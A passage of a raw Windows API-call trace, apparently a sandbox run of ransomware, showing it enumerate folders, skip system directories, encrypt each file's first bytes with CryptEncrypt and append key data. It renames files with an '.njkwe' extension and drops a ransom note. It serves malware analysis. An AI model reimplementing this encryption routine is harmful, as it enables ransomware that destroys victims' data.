(lpString1=".", lpString2=".") returned 0 [0060.433] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.433] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.433] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.433] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.433] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.433] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.433] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\..") returned 26 [0060.433] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.433] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0060.433] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="Windows") returned -1 [0060.433] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="$Recycle.bin") returned 1 [0060.433] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="System Volume Information") returned -1 [0060.433] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="Program Files") returned -1 [0060.433] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="Program Files (x86)") returned -1 [0060.433] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 61 [0060.433] StrStrIW (lpFirst="downlevel_2017_09_07_02_02_39_766.log", lpSrch=".njkwe") returned 0x0 [0060.433] lstrcmpW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.433] lstrcmpW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="taridd") returned -1 [0060.433] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.433] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.435] GetTickCount () returned 0x114f8a9 [0060.435] GetTickCount () returned 0x114f8a9 [0060.435] GetTickCount () returned 0x114f8a9 [0060.435] GetTickCount () returned 0x114f8a9 [0060.435] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.436] GetProcessHeap () returned 0xbe0000 [0060.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.436] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.438] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.438] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.438] GetProcessHeap () returned 0xbe0000 [0060.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.438] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.438] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.438] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.438] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.438] CloseHandle (hObject=0x42c) returned 1 [0060.440] GetProcessHeap () returned 0xbe0000 [0060.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.440] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log_r00t_{3sXlE5}.njkwe") returned 81 [0060.440] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log_r00t_{3sxle5}.njkwe")) returned 1 [0060.441] GetProcessHeap () returned 0xbe0000 [0060.441] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.441] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0060.441] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="Windows") returned -1 [0060.441] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="$Recycle.bin") returned 1 [0060.441] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="System Volume Information") returned -1 [0060.441] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="Program Files") returned -1 [0060.441] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="Program Files (x86)") returned -1 [0060.441] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 56 [0060.441] StrStrIW (lpFirst="oobe_2017_09_07_03_08_57_737.log", lpSrch=".njkwe") returned 0x0 [0060.441] lstrcmpW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.441] lstrcmpW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="taridd") returned -1 [0060.441] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.441] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.442] GetTickCount () returned 0x114f8b9 [0060.442] GetTickCount () returned 0x114f8b9 [0060.443] GetTickCount () returned 0x114f8b9 [0060.443] GetTickCount () returned 0x114f8b9 [0060.443] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.443] GetProcessHeap () returned 0xbe0000 [0060.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.443] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x1774, lpOverlapped=0x0) returned 1 [0060.444] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffe88c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.444] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x1774, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x1774, lpOverlapped=0x0) returned 1 [0060.444] GetProcessHeap () returned 0xbe0000 [0060.444] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.444] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.444] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.445] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.445] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.445] CloseHandle (hObject=0x42c) returned 1 [0060.445] GetProcessHeap () returned 0xbe0000 [0060.445] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.446] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log_r00t_{3sXlE5}.njkwe") returned 76 [0060.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log_r00t_{3sxle5}.njkwe")) returned 1 [0060.446] GetProcessHeap () returned 0xbe0000 [0060.446] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.446] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0060.446] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="Windows") returned -1 [0060.446] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="$Recycle.bin") returned 1 [0060.446] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="System Volume Information") returned -1 [0060.446] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="Program Files") returned -1 [0060.446] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="Program Files (x86)") returned -1 [0060.446] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 54 [0060.446] StrStrIW (lpFirst="PartnerSetupCompleteResult.log", lpSrch=".njkwe") returned 0x0 [0060.446] lstrcmpW (lpString1="PartnerSetupCompleteResult.log", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.446] lstrcmpW (lpString1="PartnerSetupCompleteResult.log", lpString2="taridd") returned -1 [0060.446] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.446] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.447] GetTickCount () returned 0x114f8b9 [0060.447] GetTickCount () returned 0x114f8b9 [0060.447] GetTickCount () returned 0x114f8b9 [0060.447] GetTickCount () returned 0x114f8b9 [0060.447] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.447] GetProcessHeap () returned 0xbe0000 [0060.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.447] ReadFile (in: hFile=0x42c, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380f7e4*=0x28, lpOverlapped=0x0) returned 1 [0060.448] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.448] WriteFile (in: hFile=0x42c, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380f7e4*=0x28, lpOverlapped=0x0) returned 1 [0060.448] GetProcessHeap () returned 0xbe0000 [0060.448] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0060.448] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.448] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.449] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.449] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.449] CloseHandle (hObject=0x42c) returned 1 [0060.450] GetProcessHeap () returned 0xbe0000 [0060.450] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0060.450] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log_r00t_{3sXlE5}.njkwe") returned 74 [0060.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log_r00t_{3sXlE5}.njkwe" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log_r00t_{3sxle5}.njkwe")) returned 1 [0060.450] GetProcessHeap () returned 0xbe0000 [0060.450] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0060.450] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0060.451] FindClose (in: hFindFile=0xc19de0 | out: hFindFile=0xc19de0) returned 1 [0060.451] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 55 [0060.451] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\$getcurrent\\logs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0060.451] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0060.452] CloseHandle (hObject=0x428) returned 1 [0060.453] GetProcessHeap () returned 0xbe0000 [0060.453] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0060.453] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0060.453] lstrcmpiW (lpString1="SafeOS", lpString2="Windows") returned -1 [0060.453] lstrcmpiW (lpString1="SafeOS", lpString2="$Recycle.bin") returned 1 [0060.453] lstrcmpiW (lpString1="SafeOS", lpString2="System Volume Information") returned -1 [0060.453] lstrcmpiW (lpString1="SafeOS", lpString2="Program Files") returned 1 [0060.453] lstrcmpiW (lpString1="SafeOS", lpString2="Program Files (x86)") returned 1 [0060.453] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS") returned 25 [0060.453] lstrcmpW (lpString1="SafeOS", lpString2=".") returned 1 [0060.453] lstrcmpW (lpString1="SafeOS", lpString2="..") returned 1 [0060.453] lstrcmpW (lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.453] GetProcessHeap () returned 0xbe0000 [0060.453] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.453] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\*") returned 27 [0060.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a260 [0060.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.455] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.455] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.455] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.455] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.455] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\.") returned 27 [0060.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.455] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.455] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.455] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.455] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.455] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.455] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\..") returned 28 [0060.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.456] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0060.456] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Windows") returned -1 [0060.456] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="$Recycle.bin") returned 1 [0060.456] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="System Volume Information") returned -1 [0060.456] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Program Files") returned -1 [0060.456] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Program Files (x86)") returned -1 [0060.456] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 44 [0060.456] StrStrIW (lpFirst="GetCurrentOOBE.dll", lpSrch=".njkwe") returned 0x0 [0060.456] lstrcmpW (lpString1="GetCurrentOOBE.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.456] lstrcmpW (lpString1="GetCurrentOOBE.dll", lpString2="taridd") returned -1 [0060.456] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.456] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0060.457] GetTickCount () returned 0x114f8c9 [0060.457] GetTickCount () returned 0x114f8c9 [0060.457] GetTickCount () returned 0x114f8c9 [0060.458] GetTickCount () returned 0x114f8c9 [0060.458] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0060.458] GetProcessHeap () returned 0xbe0000 [0060.458] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0060.458] 